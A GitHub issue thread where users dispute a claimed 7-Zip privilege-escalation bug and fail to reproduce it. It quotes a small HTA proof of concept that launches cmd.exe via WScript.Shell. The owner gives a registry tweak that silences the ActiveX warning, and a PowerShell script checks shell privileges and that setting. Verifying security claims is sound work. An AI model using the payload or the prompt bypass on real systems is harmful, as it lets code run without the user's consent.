
I can't reproduce #8

Open
Easthrone opened this issue Apr 19, 2022 · 8 comments

Comments

@Easthrone

I can't reproduce the problem described in your video. What is "privese.exe"? Is this what caused it?

@HenkPoley

Most probably there is no issue.

If there actually is a privilege escalation, that bug is not an issue with 7zip or Microsoft® HTML Help Executable (HH.exe), but with Microsoft Windows.

Kağan Çapar keeps posting different explanations. The common theme for that would be that there actually is no issue. He probably just tries to make up a cloud of plausibility.

Kağan Çapar posted this file to Tavis Ormandy (from Google Zero). If you extract it, it might hose your NTFS (older Windows), or just drop hard to remove files ("just some naïve attempt at directory traversal that couldn't possibly work"). The file is made by/for jasonLyk. It does not show this exploit. It shows a different issue.

7zip by default does not run with elevated privileges. It should not be able to get them by itself. Unless there is an issue with Windows. If 7zip can do it, other programs should be able to as well.

If there is a bug, it is not a bug in 7zip.

@kagancapar
Owner

That file doesn't even belong to me. I've been making fun of Tavis since yesterday; I don't have to send him the payload.

@liudonghua123

I could not reproduce either. When I try to drag a 7z file into the CHM content window, I only get "Do you want to open or save this file?".

(attachment: Video_2022-04-22_091551-converted.mp4)

@liudonghua123

liudonghua123 commented Apr 22, 2022

I created an HTML file which contains the public POC in https://dl.packetstormsecurity.net/2204-exploits/7zip-escalate.txt and renamed it to a 7z file. Then I got a warning. When I click Yes, I only get the current user's shell, not the SYSTEM user's shell.

```html
<html>
<head>
<!-- HTA application header: mshta.exe runs the script with full WScript access -->
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
// Spawns cmd.exe under whatever token mshta.exe itself received
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
</html>
```

(attachments: screenshot, Video_2022-04-22_095533-converted.mp4)

I also tried to drag the HTML file to the chm content window. IT IS THE SAME.

@brlin-tw

brlin-tw commented Apr 22, 2022

@kagancapar

> That file doesn't even belong to me. I've been making fun of Tavis since yesterday; I don't have to send him the payload.

Regardless of what that actually means, I've made a Wayback Machine backup for future reference, cheers!

@kagancapar
Owner

> Most probably there is no issue.
>
> If there actually is a privilege escalation, that bug is not an issue with 7zip or Microsoft® HTML Help Executable (HH.exe), but with Microsoft Windows.
>
> Kağan Çapar keeps posting different explanations. The common theme for that would be that there actually is no issue. He probably just tries to make up a cloud of plausibility.
>
> Kağan Çapar posted this file to Tavis Ormandy (from Google Zero). If you extract it, it might hose your NTFS (older Windows), or just drop hard to remove files ("just some naïve attempt at directory traversal that couldn't possibly work"). The file is made by/for jasonLyk. It does not show this exploit. It shows a different issue.
>
> 7zip by default does not run with elevated privileges. It should not be able to get them by itself. Unless there is an issue with Windows. If 7zip can do it, other programs should be able to as well.
>
> If there is a bug, it is not a bug in 7zip.

Even though I said that this file does not belong to me, you still continue to talk as if it is mine. I don't take you seriously; don't waste your breath for nothing. Don't stop insulting me on Twitter. We are not even in the same class. I'm posting the link again: this file is not mine, it was purely done to troll Tavis.

https://tweetstamp.org/1515691512553742347

@kagancapar
Owner

> I created an HTML file which contains the public POC in https://dl.packetstormsecurity.net/2204-exploits/7zip-escalate.txt and renamed it to a 7z file. Then I got a warning. When I click Yes, I only get the current user's shell, not the SYSTEM user's shell.
>
> ```html
> <html>
> <head>
> <HTA:APPLICATION ID="7zipcodeexec">
> <script language="jscript">
> var c = "cmd.exe";
> new ActiveXObject('WScript.Shell').Run(c);
> </script>
> </head>
> </html>
> ```
>
> (attachments: screenshot, Video_2022-04-22_095533-converted.mp4)
>
> I also tried to drag the HTML file to the CHM content window. IT IS THE SAME.

This is not the POC code of the privesc attack. Also, a tip for you to bypass ActiveX before working inside the payload: under `[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]`, check `"1201"=dword:00000000`. If this DWORD has a value of 1, set it to 0 and the popup will be bypassed.
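The two checks the comments above hinge on, as an added example that is not part of this thread or of the 7-Zip project: whether the cmd.exe spawned by the HTA actually holds an elevated or SYSTEM token (the fact behind "I only get the current user's shell"), and what the Local Machine zone (Zone 0) value `1201` is set to. The function names `Get-TokenContext` and `Get-Zone0ActiveXSetting` are my own, the mapping 0 = enable, 1 = prompt, 3 = disable is the standard meaning of the Internet Settings zone action values, and the script is read-only; the one write-back line is left commented out.

```powershell
# Added example, not from the issue thread or 7-Zip. Run it from the cmd.exe
# window the HTA spawns:   powershell -ExecutionPolicy Bypass -File Check-HtaContext.ps1
# 1. Report which token this shell holds (user / elevated / SYSTEM).
# 2. Report Zone 0 action 1201 ("Initialize and script ActiveX controls not
#    marked as safe for scripting"), which the comment above says drives the popup.

function Get-TokenContext {
    $identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($identity)
    # True only when the Administrators group is enabled in the token (i.e. elevated).
    $isAdmin   = $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
    # LocalSystem is the well-known SID S-1-5-18; a real privesc to SYSTEM would show it here.
    $isSystem  = $identity.User.Value -eq 'S-1-5-18'
    # Integrity label SID from the token: S-1-16-8192 = Medium, S-1-16-12288 = High, S-1-16-16384 = System.
    $labelSid  = (whoami /groups /fo csv | ConvertFrom-Csv |
                  Where-Object { $_.SID -like 'S-1-16-*' } | Select-Object -First 1).SID
    [pscustomobject]@{
        User         = $identity.Name
        IsAdmin      = $isAdmin
        IsSystem     = $isSystem
        IntegritySid = $labelSid
    }
}

function Get-Zone0ActiveXSetting {
    # Zone 0 = Local Machine zone; action 1201 is the "unsafe for scripting" ActiveX policy.
    $key   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0'
    $item  = Get-ItemProperty -Path $key -Name '1201' -ErrorAction SilentlyContinue
    $value = if ($null -eq $item) { $null } else { $item.'1201' }
    $meaning = if ($null -eq $value) { 'Not set in HKCU (machine default applies)' }
               elseif ($value -eq 0) { 'Enable (no prompt)' }
               elseif ($value -eq 1) { 'Prompt' }
               elseif ($value -eq 3) { 'Disable' }
               else                  { "Unknown ($value)" }
    [pscustomobject]@{ Key = $key; Value = $value; Meaning = $meaning }
}

$ctx = Get-TokenContext
$ctx | Format-List
if     ($ctx.IsSystem) { Write-Host 'Shell runs as SYSTEM: that would be the claimed escalation.' }
elseif ($ctx.IsAdmin)  { Write-Host 'Shell is elevated (High integrity) but not SYSTEM.' }
else                   { Write-Host 'Shell runs as the logged-on user: no escalation.' }

Get-Zone0ActiveXSetting | Format-List

# To silence the prompt the way the comment above describes (test VM only):
# Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0' -Name '1201' -Value 0 -Type DWord
```

Compare the `IntegritySid` and `IsSystem` fields against a shell opened normally from the Start menu: if both runs show the same Medium-integrity user token, the HTA gave you nothing the user did not already have, which is the point made in the comments above.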

@brlin-tw

brlin-tw commented Apr 22, 2022

@kagancapar

> (...stripped...)
> The file is made by/for jasonLyk. It does not show this exploit. It shows a different issue.

> Even though I said that this file does not belong to me, you still continue to talk as if it is mine.

False. Even Tavis themself has clearly attributed it correctly:

> When I told him that, he said "that file doesn't belong to me anyway" - then explained he was planning his wedding and was too busy to answer more questions.

-- source


> I'm posting the link again: this file is not mine, it was purely done to troll Tavis.

I failed to see how that behavior would help anyone.
